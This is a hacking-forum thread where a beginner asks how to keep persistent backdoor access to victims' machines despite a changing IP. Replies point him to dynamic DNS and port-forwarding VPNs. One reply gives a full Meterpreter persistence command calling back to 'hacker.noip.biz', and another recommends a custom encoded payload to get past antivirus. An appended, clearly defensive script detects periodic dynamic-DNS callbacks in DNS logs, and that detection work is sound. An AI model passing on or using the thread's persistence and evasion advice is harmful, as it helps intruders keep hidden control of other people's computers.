Forum Thread: Persistent Backdoor Question

Hello guys,

Rookie here, so I was watching the OTW series, and I have a couple of questions.

Let's imagine that I want to compromise some machines, and I want to have persistent access to them, in a WAN and LAN environment. Since the LHOST can't be changed after the payload has been executed on the victim machine, how can I resolve this problem? And another thing: in a WAN environment I don't have a fixed public IP, so how can I work around this, since my IP changes?

Ty for your time

11 Responses

I think you are looking for something called dynamic DNS.

-Phoenix750

Yeah, I thought of noip, but wasn't sure.

One more question: if I'm in a public place like a café or school, and I have a reverse connection on port 4444 for example, can I receive it? Since the AP is probably not port-forwarded on port 4444?

No. Unless you use a port-forwarding VPN which wouldn't matter where you are.

So just to confirm and make it simple:
WAN -> LHOST noip
Receive reverse connection anywhere -> being connected to a port-forwarding VPN

Am I right?

Ty btw

Well, DNS doesn't work as LHOST in most payloads, and the reverse_tcp_dns payload only works on 32-bit.

Most 32-bit payloads work on 64-bit systems as well, I think.

-Phoenix750

Use noip and, after compromising the system, execute persistence.
Example of the command I use after I get a meterpreter session in a WAN environment:
run persistence -A -L C:\\ -P windows/meterpreter/reverse_https -X 30 -p 443 -r hacker.noip.biz

Ty man, and btw, in a LAN environment can I dynamically change the private IP? I guess not, but maybe you guys know something that I don't.

You can just set that as an autoscript so that when you get the meterpreter shell it automatically executes (in case you aren't near your computer when the shell opens).

If you want the meterpreter to resolve your no-ip address you need to use meterpreter reverse_tcp_dns. And for the persistence you'd better use the exploit/windows/local/persistence module, since the integrated persistence in meterpreter is definitely going to be detected if the victim has any AV. Use the EXE::Custom advanced option to deliver an encoded or special payload that is better at evading the AV.

-Ne-py

Seems good, ty for your time
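
From the defender's side, the callback pattern discussed in this thread (a persisted agent resolving a dynamic DNS hostname and reconnecting on a timer) shows up in DNS logs as regular lookups from one client. The following is an added example, not part of the original thread; the log format, suffix list, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Illustrative, incomplete suffix list (assumption). "noip.biz" is the form
# used in the thread; extend with the dynamic DNS zones relevant to you.
DDNS_SUFFIXES = ("noip.biz", "no-ip.biz", "ddns.net", "hopto.org")

# Assumed log format: "<epoch_seconds> <client_ip> <queried_name>"
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)$")

# Constructed sample log, not real traffic.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com
1700000003 10.0.0.7 host1.noip.biz
1700000010 10.0.0.9 cam.ddns.net
1700000033 10.0.0.7 host1.noip.biz
1700000060 10.0.0.5 www.example.com
1700000064 10.0.0.7 HOST1.noip.biz.
1700000093 10.0.0.7 host1.noip.biz
1700000123 10.0.0.7 host1.noip.biz
1700000400 10.0.0.9 cam.ddns.net
1700000420 10.0.0.9 cam.ddns.net
1700003000 10.0.0.9 cam.ddns.net
"""

def is_ddns(name):
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in DDNS_SUFFIXES)

def find_beacons(log_text, min_hits=4, max_jitter=0.2):
    """Return {(client, name): mean_interval} for regular dynamic DNS lookups."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and is_ddns(m.group(3)):
            seen[(m.group(2), m.group(3).lower().rstrip("."))].append(int(m.group(1)))
    findings = {}
    for key, times in seen.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Low relative spread of the gaps means a machine-like periodic lookup.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            findings[key] = avg
    return findings
```

A hit is a lead for triage rather than proof: legitimate software also polls dynamic DNS names, so correlate it with the process making the lookups and with autorun entries on that host.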
